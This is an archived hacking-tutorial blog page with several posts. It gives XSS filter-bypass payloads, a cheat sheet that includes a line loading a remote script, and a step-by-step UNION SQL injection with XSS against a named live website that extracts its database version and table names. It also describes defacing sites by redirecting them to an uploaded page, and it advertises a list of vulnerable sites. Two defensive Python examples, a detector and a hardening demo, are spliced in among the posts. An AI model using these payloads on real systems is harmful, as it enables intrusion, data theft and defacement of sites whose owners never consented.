Welcome To RAi Jee Official Blog: Learn Ethical Hacking - Vulnerability Exploitation - Advanced Hacking Methods<br />
<h2>Bypassing Modern XSS WAF Filters</h2>
Published 2015-09-05.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4rGQVqD2648hymJKhoAGK0_CazbWBbBn93PSeHFOn2nRAg119OBTRsetM0fKUmyUE-qLVMBZ5RHZ6QxpOhgxtqlo2Fy5kPSqQQsYAdVH8d6jLab1DdBYkZps2K6HhKR9-jQKfnTASUFBA/s1600/Bypassing+Modern+XSS+WAF+Filters.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Modern XSS WAF Filters" border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4rGQVqD2648hymJKhoAGK0_CazbWBbBn93PSeHFOn2nRAg119OBTRsetM0fKUmyUE-qLVMBZ5RHZ6QxpOhgxtqlo2Fy5kPSqQQsYAdVH8d6jLab1DdBYkZps2K6HhKR9-jQKfnTASUFBA/s400/Bypassing+Modern+XSS+WAF+Filters.png" title="Bypassing Modern XSS WAF Filters" width="400" /></a></div>
<br />
XSS (Cross-site Scripting) is a vulnerability that occurs when a web application fails to validate the user's input parameters and then echoes them back unsafely in the server's response. An XSS attack lets an attacker insert malicious <b>HTML</b> code into the target website.<br />
In the previous tutorials on XSS we covered some <a href="http://raijee1337.blogspot.com/2015/08/ultimate-guide-to-xss-cross-site-scripting.html" target="_blank"><b>Basics of XSS</b></a> attacks and the usage of <b><a href="http://raijee1337.blogspot.com/2015/09/xss-with-sql-injection.html" target="_blank">XSS With SQL injection</a></b>.<br />
<br />
Now let's move on to the next part, <b>Bypassing the XSS WAF Filters</b> using different techniques.<br />
In normal cases, when we try to exploit an XSS vulnerability, we can break in easily because there is zero <b>Web Application Firewall Protection</b> on the target site.<br />
Against a strong WAF it is much harder to get past the security, and that is when an attacker turns to bypassing the <b>XSS WAF Filters</b>.<br />
<br />
<span style="font-size: large;"><b>Bypassing Modern XSS WAF Filters:</b></span><br />
<span style="font-size: small;">Let's start by bypassing the basic <b>XSS PAYLOAD</b></span> that we use most often in our daily routine.<br />
Here is the XSS Payload:<br />
<br />
<b>&lt;script&gt;alert("XSS")&lt;/script&gt;</b><br />
<br />
When we execute this payload against a site with only a normal WAF, we can easily exploit the <b>XSS ATTACK</b>, but if there are modern WAF filters we have to bypass them. Some WAF filters automatically strip certain characters from our XSS payload, such as " <span style="font-size: large;">'</span> " (single quote), " <span style="font-size: large;">"</span> " (double quote) or "<b> <span style="font-size: large;">/</span></b> " (forward slash). Here are some methods for bypassing these blocked characters.<br />
<br />
<b><span style="font-size: large;">Bypassing XSS WAF by using ASCII Value:</span></b><br />
In this method we bypass the XSS WAF by expressing our payload as ASCII character codes on the target site.<br />
Let's say this is our XSS payload:<br />
<br />
<b>&lt;script&gt;alert("XSS")&lt;/script&gt;</b><br />
<br />
When we execute this payload, the <b>XSS WAF Filters</b> escape some of our characters, such as single or double quotes (magic quotes), and our payload no longer works. To bypass the magic quotes we convert our payload into <b>ASCII character codes</b> and then execute it. Hackbar can do the conversion of an XSS payload into ASCII codes. The converted value is used inside a <b>JavaScript function</b>: when we execute it, JavaScript turns the codes back into the characters we encoded.<br />
<br />
For Example:<br />
<b>XSS Payload:</b><b><span style="color: red;">alert("XSS")</span></b><br />
<br />
<b>ASCII Converted Value:</b><br />
<b><span style="color: red;">String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)</span></b><br />
<br />
Now we add this converted string to our XSS payload:<br />
<b>&lt;script&gt;<span style="color: red;">String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)</span>&lt;/script&gt;</b><br />
<br />
This replaces the <b>characters</b> of our string that the WAF filters blocked, so the script passes through on the target site.<br />
<br />
<b><span style="font-size: large;">Bypassing XSS WAF by using Hex Encoding:</span></b><br />
<span style="font-size: small;">In this method we convert our whole XSS payload into</span> a percent-encoded hex value and then run it on the target site. This executes our XSS payload without the WAF blocking it.<br />
<br />
<b>Here is our XSS Payload:</b><br />
<br />
<b>&lt;script&gt;alert("XSS")&lt;/script&gt;</b><br />
<br />
<b>Encoded Value: %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e</b><br />
<br />
So we use this <b>encoded value</b> on the target site.<br />
<span style="font-size: large;"><b>Bypassing XSS WAF by OBFUSCATING:</b></span><br />
In this method we use upper- and lower-case letters in the keywords of our XSS payload to get past the XSS WAF filters. In some cases the admin has blocked plain words such as <b>alert</b> or <b>script</b>; when we execute our XSS payload the WAF filters automatically strip them and the payload doesn't work.<br />
So in that case we use mixed upper- and lower-case letters instead of the plain words to bypass the XSS WAF filters.<br />
<br />
<b>Here is our XSS payload: &lt;script&gt;alert("XSS")&lt;/script&gt;</b><br />
<br />
<b>Bypassed XSS payload: &lt;sCrIPt&gt;aLeRT("XSS")&lt;/sCriPT&gt;</b><br />
<br />
This XSS payload bypasses the XSS WAF filter and lets us run our script.<br />
These are some basic XSS WAF bypassing techniques that help in an XSS attack.<br />
<br />
<span style="font-size: large;"><b>Bypassing XSS WAF Mod_Security:</b></span><br />
Sometimes when we execute our XSS payload we get an error like:<br />
<b>"Not Acceptable! An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security"</b><br />
<br />
So we have to bypass the Mod_Security WAF on the target site.<br />
<br />
Our XSS Payload:<br />
<b>&lt;script&gt;alert("XSS")&lt;/script&gt;</b><br />
<br />
Here is the bypass of our <b>XSS PAYLOAD</b>:<br />
<b>&lt;script&gt;alert("XSS")&lt;/scri0pt&gt;</b><br />
<br />
<span style="font-size: large;"><b>Bypassing XSS WAF Dot Defender: </b></span><br />
<span style="font-size: small;">Dot Defender is another Web Application Firewall (WAF) that stops our malicious code from reaching the target site. When we try to run our XSS query on a <b>Dot Defender WAF protected</b> website it gives an error:</span><br />
<br />
<b>"dotDefender Blocked Your Request"</b><br />
<br />
So in that case our script won't work there. We need to bypass the <b>Dot Defender WAF</b> to make our scripts run in the web application. Here is the bypassed XSS payload for the Dot Defender WAF.<br />
<br />
<b>Dot Defender WAF bypassed XSS payload: &lt;svg/onload=prompt(1);&gt;</b><br />
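A request-log check that canonicalizes before matching, as an added example (not the post's code and not any WAF vendor's rule set): it percent-decodes repeatedly, applies entity decoding and case folding, and only then looks for the opening script tag, an on* event handler and String.fromCharCode, so the ASCII, hex, mixed-case, scri0pt and svg/onload variants discussed above all resolve to the same few patterns. The request lines are constructed samples.<br />

```python
import html
import re
from urllib.parse import unquote

# Constructed sample request lines (not from the original post): a benign
# search, the plain payload, then the evasions the post walks through
# (percent-encoding, mixed case plus String.fromCharCode, the malformed
# closing tag, the svg onload handler, and a double-encoded variant).
SAMPLE_REQUESTS = [
    'GET /search.php?q=firewall+rules',
    'GET /search.php?q=<script>alert("XSS")</script>',
    'GET /search.php?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e',
    'GET /search.php?q=<sCrIPt>String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41)</sCriPT>',
    'GET /search.php?q=<script>alert("XSS")</scri0pt>',
    'GET /search.php?q=<svg/onload=prompt(1);>',
    'GET /search.php?q=%253Cscript%253Ealert(1)%253C/script%253E',
]


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Undo the transformations the post relies on before matching:
    repeated percent-decoding (bounded, so nested encoding cannot force
    an endless loop), HTML entity decoding, and case folding."""
    rounds = 0
    prev = None
    while value != prev and rounds < max_rounds:
        prev = value
        value = html.unescape(unquote(value))
        rounds += 1
    return value.lower()


# Written against the canonical form: the tag name may be separated from
# '<' by whitespace, a handler may follow the tag name after '/' as well
# as a space, and a malformed closing tag does not matter because only
# the opening <script needs to match.
SIGNATURES = {
    "script-tag": re.compile(r"<\s*script\b"),
    "event-handler": re.compile(r"<\s*[a-z]+[^>]*[\s/]on[a-z]+\s*="),
    "char-construction": re.compile(r"string\.fromcharcode\s*\("),
}


def classify(request_line: str) -> list:
    """Names of the signatures that match the query string of one
    request line after canonicalization (empty list means no match)."""
    target = request_line.partition(" ")[2].rsplit(" HTTP/", 1)[0]
    query = target.partition("?")[2]
    canon = canonicalize(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(canon)]


def scan(lines):
    """Map each request line to the signature names it triggers."""
    return {line: classify(line) for line in lines}


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print("%-28s %s" % (",".join(hits) or "clean", line))
```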
<b>AUTHOR: Rai Muzammal Hussain</b><br />
<h2>XSS with SQL Injection</h2>
Published 2015-09-01.<br />
<div class="separator" style="clear: both; text-align: center;">
<img alt="XSS with SQL Injection" border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDj5RaxcNROlBrR4Qv6j3ClcQ2zwlsv_7RGPpXwuv1Eux_rt4W-l_klDnfxmrGG5dLix2Umr4BdQ4rmq4NuO6KMKDe19xqNXa30lGY0AykZsSZgEY7zR9cY1sDPcEZBKK0Hcl3ihPdCBTa/s400/XSS+with+SQL+Injection.png" title="XSS with SQL Injection" width="400" /></div>
<br />
In the previous tutorial, <b><a href="http://raijee1337.blogspot.com/2015/08/ultimate-guide-to-xss-cross-site-scripting.html" target="_blank">Ultimate Guide to XSS (Cross Site Scripting)</a></b>,<br />
we covered the basics of XSS (Cross Site Scripting) and using its payloads against our target sites. In this tutorial you will learn the XSS attack via SQL injection.<br />
If you are new to XSS, I suggest you first read the basics in the previous tutorial to learn how it works and what an attacker can do with an XSS vulnerability. Once you have the basic knowledge about XSS attacks you will be better able to understand this tutorial, <b>"XSS with SQL Injection"</b>.<br />
<br />
<br />
When we try to exploit a website through an XSS attack, we usually check some <b>"input area"</b> such as <b>"search boxes"</b> or a <b>"login area"</b>. But we can do the same via SQL injection on that target site.<br />
<br />
In an XSS attack via SQL injection we execute our XSS payloads inside a <b>UNION BASED</b> query.<br />
<br />
<b>For Example:</b><br />
We have found a website which is vulnerable to SQL injection and can inject into its database. There we can also execute our XSS payloads in our union based query. Let's take a site for practice.<br />
Here is the target site:<br />
<b><br /></b>
<b>http://www.smelisting.net/corner_category.php?id=7</b><br />
<br />
If we add a single quote at the end of the parameter it gives a <b>MySQL error</b>:<br />
<br />
<b>"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''7'' order by id desc' at line 1"</b><br />
<br />
After counting the columns, there are 5 columns in total. So let's build our union based query and execute it.<br />
<br />
<b>http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,3,4,5--+</b><br />
<br />
The 3rd column is printed on the page as output, so we will execute our XSS payload in that column.<br />
<br />
Here is the <b>XSS payload</b> that we are going to inject into the <b>UNION BASED</b> query:<br />
<br />
<span style="font-size: small;"><b>XSS PAYLOAD: &lt;script&gt;alert('XSS');&lt;/script&gt;</b></span><br />
<br />
<span style="font-size: small;">Before executing this payload we need to encode it as a <b>HEX value</b></span>.<br />
Here is the hex value of our payload, with 0x added at the start:<br />
<br />
<b>HEX VALUE:0x3c7363726970743e616c657274282758535327293b3c2f7363726970743e</b><br />
<br />
Let's insert this payload into our union based query and execute it:<br />
<br />
<b>http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,0x3c7363726970743e616c657274282758535327293b3c2f7363726970743e,4,5--+</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95U0uw0jW1Ws55SCWEtqyDvQ3_xLpj99Tn_wKQzoJTuRH3OSmuNXrUAI4owewRaKME2UJoLGPEnkOndYAD5A5DdUzLU7C3Umnsv6hGn4-J6IuHcSVXBopP1w1Lyvpyk961PAdBWohQEbE/s1600/XSS+with+SQL+Injection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95U0uw0jW1Ws55SCWEtqyDvQ3_xLpj99Tn_wKQzoJTuRH3OSmuNXrUAI4owewRaKME2UJoLGPEnkOndYAD5A5DdUzLU7C3Umnsv6hGn4-J6IuHcSVXBopP1w1Lyvpyk961PAdBWohQEbE/s400/XSS+with+SQL+Injection.png" width="400" /></a></div>
<br />
<br />
This payload displays an XSS pop-up alert. This is the basic XSS payload; you can try more payloads, which were posted in this <b><a href="http://raijee1337.blogspot.com/2015/08/ultimate-guide-to-xss-cross-site-scripting.html" target="_blank">tutorial</a></b>.<br />
<br />
<span style="font-size: large;"><b>Manipulating SQL Injection Queries in XSS Payload</b></span><br />
<br />
If we go further, we can also show the results of our SQLi queries in an XSS pop-up alert, by inserting the SQLi queries into the XSS payload.<br />
First, let's say we want to show the current database version of the target site in an XSS pop-up. See the example:<br />
<br />
<span style="font-size: small;">Our XSS Payload for Showing Version in a POP-Up:</span><br />
<br />
<b>&lt;img src=x onerror="javascript:alert('<span style="color: blue;">Your_name:</span><span style="color: lime;">Version:</span>,<span style="color: red;">version()</span>,0x')"&gt;</b><br />
<br />
The red text is our SQLi query, the blue text is the injector's name, the green text is the label we put for our variable, and the rest is our XSS payload.<br />
Before executing our query we need to encode the XSS payload parts as hex values.<br />
<br />
<b>Hex value of XSS payload:</b><br />
0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827524169204a65657e3a56657273696f6e3a,<b><span style="color: red;">version()</span></b>,0x30782729223e<br />
<br />
Let's insert our XSS payload into the vulnerable column to show the pop-up with the current version.<br />
<br />
<b>http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827524169204a65657e3a56657273696f6e3a,version(),0x30782729223e),4,5--+</b><br />
<br />
Let's execute our payload:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbcD50vQF2j8E7tEeQx1nN2olY9zkwFoNjPZGaxE0NF3Xctyldml3q-dLHI-I9hShfWeAC5S1-APigJ_0eI6MfyfDq0CPTwc3vix7-10TlDosefkd5HxL_8i4ATYSEDJqvGLahU8H6-Dt6/s1600/XSS+with+SQL+Injection+-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XSS with SQL Injection" border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbcD50vQF2j8E7tEeQx1nN2olY9zkwFoNjPZGaxE0NF3Xctyldml3q-dLHI-I9hShfWeAC5S1-APigJ_0eI6MfyfDq0CPTwc3vix7-10TlDosefkd5HxL_8i4ATYSEDJqvGLahU8H6-Dt6/s400/XSS+with+SQL+Injection+-1.png" title="XSS with SQL Injection" width="400" /></a></div>
<br />
And here we get the current version in an XSS pop-up. We can do the same for the current database and user.<br />
After popping up the <b>version</b>, the next part is showing the tables in an XSS pop-up alert, so we have to insert our query into the XSS payload to display them in the alert.<br />
Here is our DIOS query for getting the tables from the current database:<br />
<br />
<b>(select group_concat(table_name) from information_schema.tables where table_Schema=database())</b><br />
<br />
Let's add this <b>DIOS</b> query to our XSS payload:<br />
<br />
<b>http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827524169204a65657e3a56657273696f6e3a,version(),(select group_concat(table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5--+</b><br />
<br />
Now execute this query and check the response:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5aBWO613oRr-Hv-ofl2x4B2ndIU0Nz-Ap7aHUeYMdngsRpQBrxPw8qoX0hnhV2rgv20yPYcwhJt9UXGEkEw0wplekVMAr5X8mX89X5Lj6qAp6kpwOu8IiLoyaZKZjXMFVNbH0jGdfVzs7/s1600/XSS+with+SQL+Injection+-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XSS with SQL Injection" border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5aBWO613oRr-Hv-ofl2x4B2ndIU0Nz-Ap7aHUeYMdngsRpQBrxPw8qoX0hnhV2rgv20yPYcwhJt9UXGEkEw0wplekVMAr5X8mX89X5Lj6qAp6kpwOu8IiLoyaZKZjXMFVNbH0jGdfVzs7/s400/XSS+with+SQL+Injection+-2.png" title="XSS with SQL Injection" width="400" /></a></div>
<br />
<br />
We got the tables from the current database. Going further, we would normally add <a href="http://raijee1337.blogspot.com/search/label/Adding%20HTML%20Tags%20in%20SQL%20Queries" target="_blank">HTML TAGS</a> such as <b>&lt;BR&gt;</b> to start each table on a new line, but here that HTML doesn't work.<br />
In XSS we use <b>" \n "</b> to show each result on a new line, so we add this part to our <b>DIOS query</b> to show all tables on new lines in our XSS pop-up.<br />
<br />
We first need to encode it as a hex value and then insert it into the DIOS query.<br />
<br />
<b>HEX value of \n: 0x5c6e</b><br />
<br />
Let's add it to our XSS payload:<br />
<b><br /></b>
<b>http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827524169204a65657e3a56657273696f6e3a,version(),(select group_concat(0x5c6e,table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5--+</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUDRO5e64MMfhpfzpavdu3pdRVfHVtNpMPiEhHtTBP1QqOqu_tziid_yB4wpufQ2zHBLCHBAAe5RTRlg3P7-Y1ldfreLTiDj_lEmxZmbpVOca-lpJpXK1wF2rYHWd8YD4FoK38_5WV8888/s1600/XSS+with+SQL+Injection+-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XSS with SQL Injection" border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUDRO5e64MMfhpfzpavdu3pdRVfHVtNpMPiEhHtTBP1QqOqu_tziid_yB4wpufQ2zHBLCHBAAe5RTRlg3P7-Y1ldfreLTiDj_lEmxZmbpVOca-lpJpXK1wF2rYHWd8YD4FoK38_5WV8888/s400/XSS+with+SQL+Injection+-3.png" title="XSS with SQL Injection" width="400" /></a></div>
<b><br /></b>
And here we can see all tables starting on a new line in the XSS pop-up alert box. We can do the same for the columns by adding that part to our DIOS query; I leave that part to you.<br />
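The two defects this post depends on, shown side by side as an added example that is not the post's own code: the id parameter spliced into the SQL text (so a UNION can be appended), and the selected column written to the page unencoded (so the appended string is parsed as markup). The in-memory SQLite database, its table and rows are constructed stand-ins for the site's corner_category table; the payload is the post's UNION string before hex-encoding, quoted because SQLite does not accept MySQL's 0x... string literal.<br />

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the corner_category table the post queries:
    five columns, so the post's UNION SELECT 1,2,3,4,5 shape lines up."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE corner_category "
        "(id INTEGER PRIMARY KEY, slug TEXT, title TEXT, body TEXT, hits INTEGER)"
    )
    conn.executemany(
        "INSERT INTO corner_category VALUES (?,?,?,?,?)",
        [(7, "corner-7", "Corner 7", "Seventh corner", 0),
         (8, "corner-8", "Corner <b>8</b>", "Eighth corner", 0)],
    )
    return conn


# The injection the post walks through, before it is hex-encoded.
PAYLOAD = "-7' UNION SELECT 1,2,'<script>alert(1)</script>',4,5-- "


def render_vulnerable(conn: sqlite3.Connection, id_param: str) -> str:
    """The pattern behind the post: the id parameter is pasted into the SQL
    text and the third column is written to the page untouched."""
    sql = ("SELECT id, slug, title, body, hits FROM corner_category "
           "WHERE id='%s' ORDER BY id DESC" % id_param)
    rows = conn.execute(sql).fetchall()
    return "".join("<h1>%s</h1>" % row[2] for row in rows)


def render_hardened(conn: sqlite3.Connection, id_param: str) -> str:
    """Two independent fixes: a bound parameter keeps the id from changing
    the query's shape (nothing can be appended to it), and html.escape keeps
    any value that does reach the page from being parsed as markup."""
    sql = ("SELECT id, slug, title, body, hits FROM corner_category "
           "WHERE id=? ORDER BY id DESC")
    rows = conn.execute(sql, (id_param,)).fetchall()
    return "".join("<h1>%s</h1>" % html.escape(row[2]) for row in rows)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=7:      ", render_vulnerable(db, "7"))
    print("vulnerable, payload:   ", render_vulnerable(db, PAYLOAD))
    print("hardened,   id=8:      ", render_hardened(db, "8"))
    print("hardened,   payload:   ", repr(render_hardened(db, PAYLOAD)))
```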
<b><br /></b>
<b>AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee</b><br />
<h2>Ultimate Guide to XSS (Cross Site Scripting)</h2>
Published 2015-08-23.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqFxYMh5gtMwGthkck9zck5VKqCb7O-tmDtPXIgWcDq9lYVt3tdTi6Z1coMLKhXnw2BjR-u2mJegQ28t8m0qExE98nJQyf9nJlqwk8iWbR16VSevsj8Y7x-Ie-EQHV7gsCoXLeOc29fr2T/s1600/Ultimate+Guide+to+XSS+%2528+Cross+Site+Scripting+%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Ultimate Guide to XSS (Cross Site Scripting)" border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqFxYMh5gtMwGthkck9zck5VKqCb7O-tmDtPXIgWcDq9lYVt3tdTi6Z1coMLKhXnw2BjR-u2mJegQ28t8m0qExE98nJQyf9nJlqwk8iWbR16VSevsj8Y7x-Ie-EQHV7gsCoXLeOc29fr2T/s400/Ultimate+Guide+to+XSS+%2528+Cross+Site+Scripting+%2529.png" title="Ultimate Guide to XSS (Cross Site Scripting)" width="400" /></a></div>
<span class="post-description" style="text-align: justify;">Today I'm going to post a hands-on guide to XSS for newbies.</span><br />
<span class="post-description" style="text-align: justify;">A lot of people ask me to write some tutorials on XSS, so I've decided to cover XSS for them too.</span><br />
<h3>
<span class="post-description" style="font-size: large; text-align: justify;">What is XSS ?</span></h3>
<span class="post-description" style="text-align: justify;">Everyone knows that XSS stands for Cross Site Scripting. XSS is one of the most common web application vulnerabilities, and increasingly popular at this time; it allows an attacker to submit malicious queries or code through the target website's <b>"search boxes"</b> as well as through the target URL.</span><br />
<span class="post-description" style="text-align: justify;">This vulnerability occurs due to poorly developed application code. An attacker is able to inject malicious HTML code through client web browsers.</span><br />
<span class="post-description" style="text-align: justify;">Most of an XSS attack is based on <b>JavaScript</b> and <b>HTML</b> for executing malicious code on the target website. Once an attacker is able to run his JavaScript on the site, that JavaScript executes whenever a user comes to the site and clicks on the malicious link. Many people do XSS just to show a pop-up with their name to advertise themselves.</span><br />
<span class="post-description" style="text-align: justify;">XSS can be used for phishing as well as stealing accounts, and we can do some social</span> engineering with XSS.<br />
<br />
<h4>
<span style="font-size: large;">A Simple XSS Example</span></h4>
This is a simple example of what we can do with XSS. Say an attacker has found an XSS vulnerability in a high-profile website with a lot of users, and is able to run malicious code there with <b>JAVASCRIPT</b>. Whenever a user comes to that website the malicious code executes, and it can be used to redirect the user to any fake page we want, such as a phishing page.<br />
<br />
<h4>
<span style="font-size: large;"><b>XSS ATTACK</b></span></h4>
First we have to find a vulnerable website for practicing XSS. Finding an XSS vulnerable website is easier than finding SQLi sites. In SQL injection we simply add a single quote ' at the end of the parameter to check whether the target site is vulnerable, but in XSS we have to determine the vulnerability by executing multiple XSS queries.<br />
<br />
The places where we mostly test for an XSS vulnerability are a <b>"SEARCH BOX"</b>, <b>"Login or Register"</b> forms, or any other <b>input field</b> where we can execute our script.<br />
Once we have found an input field where we can execute our code, like a search box, we test it there.<br />
This query is the most common one for testing XSS, but you can try other queries as well.<br />
<span style="font-size: large;"><b>&lt;script&gt;alert("XSS")&lt;/script&gt;</b></span><br />
<br />
<span style="font-size: small;">Once we put this query in the search box and execute it, it displays a pop-up with the string "XSS". With normal filters our query executes successfully and shows the pop-up, but advanced filters block some characters and we need to bypass them.</span><br />
<br />
<h4>
<span style="font-size: large;">XSS Cheat Sheet: </span></h4>
<b>&lt;script&gt;alert(1);&lt;/script&gt;</b><br />
<b>&lt;script&gt;alert('XSS');&lt;/script&gt;</b><br />
<b>&lt;IMG SRC=javascript:alert("XSS")&gt;</b><br />
<b>&lt;IMG SRC=javascript:alert('XSS')&gt;</b><br />
<b>&lt;scr&lt;script&gt;ipt&gt;alert('XSS');&lt;/scr&lt;/script&gt;ipt&gt;</b><br />
<b>'&gt;&lt;script&gt;alert(0)&lt;/script&gt;</b><br />
<b>&lt;img src=foo.png onerror=alert(/xssed/) /&gt;</b><br />
<b>&lt;style&gt;@import'ja asc<br />ipt:alert("XSS")';&lt;/style&gt;</b><br />
<b>&lt;? echo('&lt;scr)'; echo('ipt&gt;alert("XSS")&lt;/script&gt;'); ?&gt;</b><br />
<b>&lt;marquee&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;&lt;/marquee&gt;</b><br />
<b>&lt;IMG SRC="jav&amp;#x09;ascript:alert('XSS');"&gt;</b><br />
<b>&lt;IMG SRC="jav&amp;#x0A;ascript:alert('XSS');"&gt;</b><br />
<b>&lt;IMG SRC="jav&amp;#x0D;ascript:alert('XSS');"&gt;</b><br />
<b>&lt;script src=http://yoursite.com/your_files.js&gt;&lt;/script&gt;</b><br />
<b>&lt;/title&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;</b><br />
<b>&lt;IMG DYNSRC="javascript:alert('XSS')"&gt;</b><br />
<b>&lt;img src=javascript:alert('XSS')&gt;</b><br />
<b>&lt;script language=JavaScript&gt;alert('XSS')&lt;/script&gt;</b><br />
<b>&lt;body onunload=javascript:alert('XSS');&gt;</b><br />
<b>&lt;body onLoad='alert('XSS');'</b><br />
<b>[color=red' onmouseover='alert('xss')']mouse over[/color]</b><br />
<b>'/&gt;&lt;/a&gt;&lt;/&gt;&lt;img src=1.gif onerror=alert(1)&gt;</b><br />
<b>window.alert('Bonjour !');</b><br />
<b>&lt;div style='x:expression((window.r==1)?'':eval('r=1;</b><br />
<b>&lt;iframe&lt;?php echo chr(11)?&gt; onload=alert('XSS')&gt;&lt;/iframe&gt;</b><br />
<b>'&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS&lt;/h1&gt;&lt;/marquee&gt;</b><br />
<br />
<b><span style="font-size: large;">Understanding XSS WAFs' Behaviour</span></b><br />
<br />
<span style="font-size: small;">Use different queries for better results; each site's WAF filters different characters.</span><br />
<span style="font-size: small;">On some sites, when we try to find an XSS vulnerability and fail, we may notice in the page source that some characters of our payload are missing, like <b>&gt;</b>, <b>"</b>, <b>/</b>.</span><br />
<br />
<span style="font-size: small;">That is because the web application firewall is blocking these characters. There we need to bypass them with different bypassing techniques, for example:</span><br />
<br />
<b><span style="font-size: small;">Bypassing XSS Payload via Hex Encoding</span></b><br />
<br />
<b><span style="font-size: small;">Bypassing XSS Payload via Ascii Encoding</span></b><br />
<br />
<h4>
<span style="font-size: large;">Defacing via XSS</span></h4>
<span style="font-size: small;">Many people ask how they can deface via XSS, so I've decided to add this part to the tutorial too. A lot of people inject sites all day just for defacing. Defacing via XSS is as simple as 1, 2, 3, 4, 5.</span><br />
<span style="font-size: small;">In XSS we put the link to our uploaded deface page HTML into our string. We can use some sites made for uploading HTML files, like</span><br />
<br />
<span style="font-size: small;"><b>http://www.pastehtml.com</b></span><br />
<br />
<span style="font-size: small;">After uploading your deface HTML to this site you get the link to your file; copy it and put it in the XSS payload.</span><br />
<b>&lt;script&gt;window.location="http://www.pastehtml.com/DefacePAGE/";&lt;/script&gt;</b><br />
When you execute this query on the XSS vulnerable website you can see your deface page in the <b>pop-up</b>.<br />
<b><br /></b>
<b>Author: Rai Muzammal Hussain a.k.a RAi Jee</b><br />
<h2>Cookie Based Injection</h2>
Published 2015-08-14.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgREkxqj7b8lBIq2cCydrJcMe0-97hlrdopMlnr_gniyoPsNssuQU4S49MNPR6NNwTOz48nMKRxSyFJj9vISwSxUOvEl4lP-5V_oVT75uYBBptzYhEzgXaIwlHgmxVgR9Z3CmdqsKEf_jX0/s1600/Cookie+Based+Injection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Cookie Based Injection" border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgREkxqj7b8lBIq2cCydrJcMe0-97hlrdopMlnr_gniyoPsNssuQU4S49MNPR6NNwTOz48nMKRxSyFJj9vISwSxUOvEl4lP-5V_oVT75uYBBptzYhEzgXaIwlHgmxVgR9Z3CmdqsKEf_jX0/s320/Cookie+Based+Injection.png" title="Cookie Based Injection" width="320" /></a></div>
In this tutorial you will learn how to inject a website through cookies.<br />
This step-by-step video tutorial shows how to inject a website via cookies.<br />
Watch this tutorial on cookie based SQL injection:<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/6x8hFpMapWE/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/6x8hFpMapWE?feature=player_embedded" width="320"></iframe></div>
<br />
<h2>10000 Fresh SQLi Vulnerable Websites List</h2>
Published 2015-08-10.<br />
<div class="separator" style="clear: both; text-align: center;">
